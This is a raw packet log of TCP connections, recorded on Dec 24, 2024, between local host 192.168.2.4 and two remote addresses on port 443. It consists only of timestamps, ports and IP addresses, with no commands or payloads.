                                                                                                                                Dec 24, 2024 18:21:26.358443975 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.358449936 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.358788013 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.358908892 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.359175920 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:26.399360895 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:26.403359890 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.260485888 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.260570049 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.260579109 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.260626078 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.260725975 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.260766983 CET44350004142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.260833979 CET50004443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.261380911 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.261451006 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.261641026 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.261666059 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.261693001 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.261730909 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.261935949 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.261965036 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.261977911 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.261991978 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.265017986 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.265084028 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.265105009 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.265153885 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.265336037 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.265378952 CET44350005142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.265433073 CET50005443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.265857935 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.265908003 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.265932083 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.265995979 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.266005039 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.266058922 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.266432047 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:27.266467094 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:27.266515017 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:27.266550064 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.953862906 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.953969955 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.955707073 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.955785990 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.956434965 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.956576109 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.957472086 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.957501888 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.957763910 CET44350013142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.957978964 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.959275961 CET50013443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:28.960352898 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.960383892 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.960634947 CET44350015142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.960827112 CET50015443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.961055040 CET44350014142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.961097002 CET44350016142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.961129904 CET50014443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:28.961172104 CET50016443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.977322102 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.977374077 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.981111050 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.982642889 CET50050443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.982657909 CET44350050142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.983442068 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.983501911 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.983793974 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.984385967 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.984405994 CET50049443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.984421968 CET44350049142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.984421968 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.985351086 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.985368967 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.985438108 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.987093925 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.987131119 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.987282991 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.988620043 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.988624096 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.988634109 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.988667965 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.988832951 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.989032030 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:36.989059925 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:36.989492893 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:36.989501953 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.673917055 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.674072027 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.674482107 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.674503088 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.676434994 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.676450014 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.683161974 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.683389902 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.684649944 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.684667110 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.684843063 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:38.684855938 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.685985088 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.686060905 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.688242912 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.688642979 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.690819025 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.690829039 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.691061020 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.691186905 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.693094969 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.694397926 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.694421053 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.694849968 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.695034027 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.695599079 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:38.735368967 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.743347883 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.587686062 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.587765932 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.587831020 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.587924004 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.588073969 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.588129044 CET44350059142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.588179111 CET50059443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.588597059 CET50074443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.588630915 CET44350074142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.588689089 CET50074443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.588881969 CET50074443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.588893890 CET44350074142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.593137026 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.593338013 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.593364000 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.593472958 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.593496084 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.593579054 CET44350060142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.593641043 CET50060443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.594142914 CET50075443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.594176054 CET44350075142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.594235897 CET50075443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.594449043 CET50075443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:39.594464064 CET44350075142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.656445026 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.656488895 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.656501055 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.656512976 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.656524897 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.656548977 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.656554937 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.656594038 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.656668901 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.656707048 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.656709909 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.656759024 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.657113075 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.657200098 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.657233953 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.657288074 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.657305956 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.657371044 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.657402992 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.657449961 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.657463074 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.657560110 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.657608032 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.657851934 CET50061443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.657865047 CET44350061142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.658211946 CET50076443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.658243895 CET44350076142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.658348083 CET50076443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.658529043 CET50076443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.658541918 CET44350076142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.659612894 CET50062443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.659636021 CET44350062142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.659929991 CET50077443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.659991026 CET44350077142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:39.660343885 CET50077443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.660528898 CET50077443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:39.660559893 CET44350077142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:40.084621906 CET50074443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:40.084745884 CET50075443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:40.084748983 CET50076443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:40.084819078 CET50077443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:40.086404085 CET50079443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:40.086494923 CET44350079142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:40.086675882 CET50079443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:40.087896109 CET50079443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:40.087901115 CET50080443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:40.087944031 CET44350079142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:40.087992907 CET44350080142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:40.089488029 CET50080443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:40.089978933 CET50080443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:40.090013981 CET44350080142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:41.776834965 CET44350079142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:41.776943922 CET50079443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:41.777571917 CET44350079142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:41.777636051 CET50079443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:41.781918049 CET44350080142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:41.781991005 CET50080443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:41.782650948 CET44350080142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:41.782710075 CET50080443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:41.786070108 CET50079443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:41.786108971 CET44350079142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:41.786329031 CET44350079142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:49.318073988 CET50110443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:49.318116903 CET44350110142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:49.319268942 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:49.319329977 CET44350117142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:49.319384098 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:49.320003033 CET50111443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:49.320019007 CET44350111142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:49.320702076 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:49.320780993 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:49.320844889 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:49.323296070 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:49.323322058 CET44350117142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:49.325066090 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:49.325107098 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:49.325193882 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:49.325445890 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:49.325459003 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:49.325596094 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:49.325628042 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:49.326795101 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:49.326816082 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:49.327056885 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:49.327224970 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:49.327238083 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.034017086 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.034271955 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:51.034575939 CET44350117142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.034961939 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.035067081 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:51.035068035 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.037452936 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:51.037465096 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.037714958 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.037785053 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:51.037841082 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.037849903 CET44350117142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.038280964 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.038395882 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.038605928 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:51.038614035 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.038928032 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:51.038938999 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.039093018 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:51.039454937 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:51.039850950 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.039856911 CET44350117142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.040194988 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.040194988 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.040210009 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.040216923 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.079365969 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.087336063 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.950768948 CET44350117142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.950900078 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.951225996 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.951262951 CET44350117142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.951354027 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.951440096 CET50129443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.951469898 CET44350129142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.951680899 CET50129443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.953043938 CET50129443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.953058958 CET44350129142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.955373049 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.955599070 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.955621958 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.955738068 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.955738068 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.955857038 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.956027031 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.956285000 CET50130443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.956321001 CET44350130142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.956549883 CET50130443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.956717968 CET50130443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.956732035 CET44350130142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100346088 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100388050 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100399971 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.100415945 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100429058 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.100466013 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.100470066 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100509882 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.100621939 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100662947 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100671053 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.100703955 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.101152897 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.101164103 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.101906061 CET50131443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.101946115 CET44350131142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102555990 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102650881 CET50131443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.102710009 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102741003 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.102749109 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102758884 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.102794886 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.102799892 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102818012 CET50131443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.102833986 CET44350131142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102842093 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.103341103 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.103403091 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.103457928 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.103872061 CET50132443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.103909969 CET44350132142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.103965044 CET50132443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.104301929 CET50132443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.104325056 CET44350132142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.662314892 CET50129443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.662412882 CET50130443192.168.2.4142.250.181.14
